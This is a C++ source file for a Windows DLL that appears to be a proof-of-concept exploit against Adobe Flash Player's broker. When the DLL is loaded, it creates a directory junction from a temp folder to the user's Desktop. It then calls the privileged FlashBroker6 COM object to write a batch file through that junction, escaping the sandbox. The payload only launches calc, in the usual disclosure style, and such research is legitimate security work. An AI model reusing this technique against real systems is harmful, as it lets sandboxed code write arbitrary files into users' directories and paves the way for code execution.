#include "stdafx.h"
#define _SECURE_COMPILER_COM 0
#include <comdef.h>
#include <shlobj.h>

#include "FSLinks.h"
#include "FlashUtil_ActiveX_h.h"

#include <strsafe.h>

void DebugPrintf(LPCSTR lpFormat, ...)
{
	CHAR buf[1024];
	va_list va;

	va_start(va, lpFormat);

	StringCbVPrintfA(buf, sizeof(buf), lpFormat, va);

	OutputDebugStringA(buf);
}

bstr_t GetKnownFolder(REFKNOWNFOLDERID rfid)
{
	bstr_t ret;
	PWSTR pPath = nullptr;
	HRESULT hr = SHGetKnownFolderPath(rfid, KF_FLAG_DONT_VERIFY, nullptr, &pPath);

	if (SUCCEEDED(hr))
	{
		ret = pPath;
		CoTaskMemFree(pPath);
	}
	else
	{
		DebugPrintf("Error getting folder: %08X\n", hr);
	}

	return ret;
}

bstr_t GetRoamingProfile()
{
	return GetKnownFolder(FOLDERID_RoamingAppData);
}

bstr_t GetDesktop()
{
	return GetKnownFolder(FOLDERID_Desktop);
}

bstr_t GetAdobeDirectory()
{
	return GetRoamingProfile() + L"\\Adobe\\Flash Player\\";
}

bstr_t GetTempDir()
{
	WCHAR tempPath[MAX_PATH];

	GetTempPath(MAX_PATH, tempPath);

	return tempPath;
}

HANDLE CreateAndOpenDirectory(const bstr_t& name)
{
	CreateDirectoryW(name, nullptr);

	return CreateFile(name, GENERIC_READ | GENERIC_WRITE,
		FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, nullptr,
		OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT, nullptr);
}

bstr_t g_dirName;
bstr_t g_startup;

#define RtlGenRandom SystemFunction036

extern "C" BOOLEAN NTAPI RtlGenRandom(PVOID RandomBuffer, ULONG RandomBufferLength);

unsigned long random()
{
	ULONG ret = 0;
	RtlGenRandom(&ret, sizeof(ULONG));
	return ret;
}

bstr_t GenRandomName()
{
	WCHAR ret[17];

	for (int i = 0; i < 16; i++)
	{
		ret[i] = L'a' + (random() % 26);
	}

	ret[16] = 0;

	return ret;
}

HRESULT BrokerWriteFile(IFlashBroker6* pUnk, const bstr_t& path)
{
	HRESULT hr = E_FAIL;
	unsigned long cookie;

	hr = pUnk->BrokerCreateFile(path, 0, 1, &cookie);

	if (hr == S_OK)
	{
		SAFEARRAY* psa;
		SAFEARRAYBOUND rgsabound[1];
		unsigned char buf[] = "calc.exe";

		rgsabound[0].lLbound = 0;
		rgsabound[0].cElements = sizeof(buf) - 1;
		psa = SafeArrayCreate(VT_UI1, 1, rgsabound);

		void* ppvData;
		SafeArrayAccessData(psa, &ppvData);
		memcpy(ppvData, buf, sizeof(buf) - 1);
		SafeArrayUnaccessData(psa);

		unsigned long written = 0;

		hr = pUnk->BrokerWriteFile(cookie, psa, &written);

		pUnk->BrokerCloseHandle(cookie);

		SafeArrayDestroy(psa);
	}
	else
	{
		DebugPrintf("Failed to create file %08X %ls\n", hr, (const wchar_t*)path);
	}

	return hr;
}

void TestMoveFileEx()
{
	IFlashBroker6* pUnk;

	HRESULT hr = CoCreateInstance(__uuidof(FlashBrokerImp6), nullptr, CLSCTX_LOCAL_SERVER | CLSCTX_ACTIVATE_32_BIT_SERVER, IID_PPV_ARGS(&pUnk));

	if (SUCCEEDED(hr))
	{
		bstr_t dirName = GetTempDir() + GenRandomName();

		HANDLE hDir = CreateAndOpenDirectory(dirName);

		FSLinks::CreateJunctionPoint(hDir, GetDesktop());

		bstr_t fileName = dirName + L"\\calc.bat";

		BrokerWriteFile(pUnk, fileName);

		CloseHandle(hDir);

		pUnk->Release();
	}
	else
	{
		DebugPrintf("Failed to create broker: %08X\n", hr);
	}
}

DWORD CALLBACK RunTest(LPVOID lpArg)
{
	CoInitialize(nullptr);

	TestMoveFileEx();

	CoUninitialize();

	FreeLibraryAndExitThread((HMODULE)lpArg, 0);
}

BOOL APIENTRY DllMain(HMODULE hModule,
	DWORD  ul_reason_for_call,
	LPVOID lpReserved
	)
{
	UNREFERENCED_PARAMETER(lpReserved);

	switch (ul_reason_for_call)
	{
	case DLL_PROCESS_ATTACH:
	{
		HANDLE hThread = CreateThread(nullptr, 0, RunTest, hModule, 0, nullptr);
		if (hThread == nullptr)
		{
			DebugPrintf("Error creating thread %08X\n", GetLastError());
		}
		break;
	}
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return TRUE;
}
